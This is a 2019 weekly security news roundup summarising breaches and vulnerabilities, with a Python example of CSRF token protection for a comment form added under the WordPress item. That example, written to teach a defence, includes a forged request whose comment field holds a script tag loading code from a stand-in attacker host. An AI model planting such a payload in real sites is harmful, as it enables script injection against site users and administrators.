Polyverse Weekly Breach Report


A snapshot of last week’s reported cybersecurity breaches and vulnerabilities

Tufts University
Tufts University expelled a student after accusing her of stealing university logins and using them to break into the student records system. The problem with the accusation is that for every intrusion the school attributes to her she has evidence of her whereabouts, including eyewitness accounts that she was nowhere near the laptop she is accused of using. Two remote access trojans were found on her computer, which suggests that someone else had remote control of it without her knowledge. To read more: https://techcrunch.com/2019/03/08/tufts-grade-hacking

Chinese “breedready” database
A security researcher discovered an open Chinese database that contains personal information for more than 1.8m women. The information includes phone numbers, addresses, and “breedready” status. The youngest girl in the database is 15 years old. To read more: https://www.theguardian.com/world/2019/mar/11/china-database-lists-breedready-status-of-18-million-women

Windows 10
Microsoft added a safety measure to Windows 10 that automatically uninstalls a recently installed update if the machine fails to start and other recovery attempts do not help. The removed update is then blocked from reinstalling for 30 days, giving Microsoft time to investigate and fix the problem before it is offered again. To read more: https://thehackernews.com/2019/03/windows-buggy-updates.html

Russia vs. ProtonMail
The Russian government has ordered internet providers to block the encrypted email provider ProtonMail. The block was ordered by the Federal Security Service (FSB), the successor agency to the KGB, which accused the company of facilitating bomb threats. To read more: https://techcrunch.com/2019/03/11/russia-blocks-protonmail/

Swiss internet voting system
A group of researchers found a critical flaw that could allow someone to alter votes undetected in the new internet voting system Switzerland plans to roll out. The flaw lies in the part of the system that is supposed to let auditors verify that the ballots counted in an election are the same ones the voters cast, which is exactly the safeguard meant to catch tampering. The researchers urged the Swiss government to halt the system's rollout immediately. To read more: https://motherboard.vice.com/en_us/article/zmakk3/researchers-find-critical-backdoor-in-swiss-online-voting-system

IBM facial recognition
IBM released a collection of nearly a million photos sourced from the photo hosting site Flickr as a step towards reducing bias in facial recognition. Some of the photographers whose images were included in the dataset were concerned that their photos could be used to train surveillance systems. IBM says Flickr users can opt out of the dataset, but the company has not publicly shared which Flickr users and photos are included, so photographers have no easy way to find out whether they are in it. To read more: https://www.nbcnews.com/tech/internet/facial-recognition-s-dirty-little-secret-millions-online-photos-scraped-n981921

Counter-Strike
Researchers report that 39% of all Counter-Strike 1.6 game servers available online are malicious, set up to compromise gamers' computers remotely. The team disclosed that an attacker was silently compromising computers worldwide by exploiting a zero-day in the game client. The client contains unpatched remote code execution vulnerabilities that let a malicious server run code on a player's machine as soon as the client connects to it. To read more: https://thehackernews.com/2019/03/counter-strike-game-servers.html

The Committee for Public Counsel Services
A cyberattack on the Committee for Public Counsel Services, the Massachusetts agency that oversees public defenders, has slowed its operations, delayed some hearings and disabled its email systems. The attackers used ransomware to lock up the agency's servers and demanded payment, which the agency refused because it had backups from which to restore the systems. Restoring from backup takes time, however, and the attack still caused weeks of delays in the court system. To read more: https://www.bostonglobe.com/business/2019/03/12/cyberattack-with-ransom-demand-has-disrupted-public-defenders-for-weeks/6TkoNMGrHbnzT7tsMI2xoO/story.html

US Navy
An internal review conducted by the US Navy found that the Navy and its various industry partners are under cyber attack by Chinese hackers. To read more: https://www.militaryaerospace.com/articles/pt/2019/03/cyber-attack-navy-chinese-hackers.html

Kathmandu
Kathmandu, an outdoor clothing and equipment retailer, is investigating a security incident affecting its online trading websites. An unidentified third party had access to the website platform from January 8th to February 12th, a window in which customer data entered on the sites may have been captured. To read more: https://www.reseller.co.nz/article/658766/kathmandu-investigates-suspected-data-breach/

Buying zero-days
A Motherboard journalist got an in-depth look at how a company goes about buying a zero-day exploit. While at Offensive Con he tweeted that anyone wanting to talk about buying or selling zero-days should contact him on the encrypted messaging app Signal, and a representative of a company called Haboob reached out. To read more: https://motherboard.vice.com/en_us/article/xwbk5j/saudi-cybersecurity-company-tried-buy-zero-days-from-me-haboob-darkmatter

Privacy as a luxury
Vice reports on the effects of data breaches on lower-income individuals and how the stakes are much higher than average. To read more: https://www.vice.com/en_us/article/mbz493/privacy-is-becoming-a-luxury-what-data-leaks-are-like-for-the-poor

Equifax Canada
Equifax Canada is urging Canadians to do more to protect their data. Equifax, a company that is under investigation by the United States Congress for having inadequate security, is concerned that Canadians are not doing enough to stay secure. To read more: https://securitytoday.com/articles/2019/03/15/equifax-tells-canadians-to-do-more-to-protect-their-data.aspx

Gearbest
Gearbest is an e-commerce portal for Chinese goods, widely used to buy and import Android smartphones from China into countries where the OEM does not officially sell them. White hat hackers found that several parts of Gearbest's database were exposed to the internet without authentication, leaking more than 1.5m records including customer accounts, addresses, orders and payment details. The researchers attempted to contact Gearbest about the exposure but received no response. To read more: https://www.xda-developers.com/gearbest-database-security-breach-accounts-addresses-orders-payment-unsecured/

Check out Have I Been Pwned to see if any of your accounts have been exposed by the above breaches.

Reported Vulnerabilities

Mobile phishing campaign
A cybersecurity researcher shared details of a new mobile phishing campaign. The attack mimics the look and feel of a browser window to trick people into giving their login credentials to attackers. To see the attack in action and read more: https://thehackernews.com/2019/03/ios-mobile-phishing-attack.html

SimBad malware
Up to 150m users might have downloaded the SimBad Android malware onto their phones. SimBad is malicious adware that was found mainly in racing and shooter game apps. To read more: https://www.zdnet.com/article/almost-150-million-users-impacted-by-new-simbad-android-adware/

Microsoft Patch Tuesday
Microsoft released its March 2019 security updates, addressing 64 CVEs. These include two zero-days that are actively being exploited in the wild, so this month's updates should be applied promptly. To read more: https://thehackernews.com/2019/03/microsoft-windows-security-updates.html

Android Antivirus apps
An Austrian antivirus testing lab tested 250 antivirus apps from the Google Play Store against 2,000 malware samples. Only 80 of the apps detected more than a small fraction of the samples; the rest caught little or nothing. Many of the apps appear to have been created to display ads or pad a developer's portfolio rather than to detect malware. To read more: https://www.tomsguide.com/us/android-av-apps-bogus,news-29621.html

Adobe
Adobe released patches for two security vulnerabilities in its March security update. Both are critical code execution vulnerabilities, one in Photoshop and one in Digital Editions. Adobe found no evidence of either being exploited in the wild. To read more: https://thehackernews.com/2019/03/adobe-software-updates.html

Fujitsu wireless keyboard
A German pen-testing company found that Fujitsu LX wireless keyboards are vulnerable to keystroke injection. An attacker within radio range can transmit crafted packets to the keyboard's USB dongle, which accepts them as if they were typed on the real keyboard. The weakness lies in the cryptographic protection implemented by the USB receiver, not in the keyboard itself. To read more: https://www.zdnet.com/article/fujitsu-wireless-keyboard-model-vulnerable-to-keystroke-injection-attacks/

WordPress
A new flaw was discovered in WordPress that can be chained into remote code execution. It is a cross-site request forgery (CSRF) issue in the comment section, which is enabled by default, and it affects all WordPress versions before 5.1.1. Because a CSRF attack rides on the victim's existing session, an attacker only needs a privileged user to visit a malicious page while logged in to the site. To read more: https://thehackernews.com/2019/03/hack-wordpress-websites.html
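As an added illustration of the class of bug described above (not WordPress code, and not the specific WordPress fix), the following Python shows a comment handler that trusts the session cookie alone beside one that also demands a per-session, per-action token carried in the form body. The request/session structures, the HMAC token scheme and the sample forged request are constructed assumptions for the demo; a cross-site page can make the browser send the cookie, but it cannot read or forge the token.

```python
import hashlib
import hmac
import secrets

# Server-side secret used to derive CSRF tokens (assumption: one key per deployment).
SERVER_KEY = secrets.token_bytes(32)


def issue_csrf_token(session_id: str, action: str) -> str:
    """Token bound to both the session and the action it authorises (e.g. post_comment)."""
    msg = f"{session_id}:{action}".encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def verify_csrf_token(session_id: str, action: str, token) -> bool:
    """Constant-time comparison; a missing or foreign token fails closed."""
    if not isinstance(token, str):
        return False
    return hmac.compare_digest(issue_csrf_token(session_id, action), token)


def handle_comment_vulnerable(request: dict, comments: list) -> int:
    """Vulnerable form: any POST carrying a valid session cookie is accepted,
    regardless of which site the browser was on when it sent it."""
    comments.append({"author": request["session_id"], "body": request["form"]["comment"]})
    return 200


def handle_comment_hardened(request: dict, comments: list) -> int:
    """Hardened form: the same request must also carry a token that only the
    site's own pages could have embedded in the form."""
    token = request["form"].get("_csrf_token")
    if not verify_csrf_token(request["session_id"], "post_comment", token):
        return 403
    comments.append({"author": request["session_id"], "body": request["form"]["comment"]})
    return 200


def simulate_forged_submission() -> dict:
    """Constructed scenario: a logged-in admin visits attacker.example, whose page
    auto-submits a comment form to the victim site. The browser attaches the admin's
    session cookie, but the attacker's page never saw a valid CSRF token."""
    admin_session = "sess-admin-1234"  # constructed session identifier
    forged = {
        "session_id": admin_session,           # sent by the browser automatically
        "origin": "https://attacker.example",  # not the victim site
        "form": {"comment": "<script src=//attacker.example/x.js></script>"},
    }
    legit = {
        "session_id": admin_session,
        "origin": "https://blog.example",
        "form": {
            "comment": "Nice post",
            "_csrf_token": issue_csrf_token(admin_session, "post_comment"),
        },
    }
    vulnerable_db, hardened_db = [], []
    return {
        "vulnerable_forged": handle_comment_vulnerable(forged, vulnerable_db),
        "hardened_forged": handle_comment_hardened(forged, hardened_db),
        "hardened_legit": handle_comment_hardened(legit, hardened_db),
        "vulnerable_stored": len(vulnerable_db),
        "hardened_stored": len(hardened_db),
    }


if __name__ == "__main__":
    print(simulate_forged_submission())
```

The token is tied to the action name as well as the session, so a token issued for one form cannot be replayed against a different, more sensitive endpoint. The stored payload in the forged request is only a placeholder string showing why a comment form matters: once an attacker can plant content that an administrator's browser renders, the path from CSRF to stored script to code execution is short.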

WinRAR
Hackers are still exploiting a recently patched vulnerability in WinRAR, a popular Windows file compression application. WinRAR has no auto-update feature, so users who have not manually downloaded the fixed version remain exposed to malicious archives. To read more: https://thehackernews.com/2019/03/winrar-hacking-malware.html
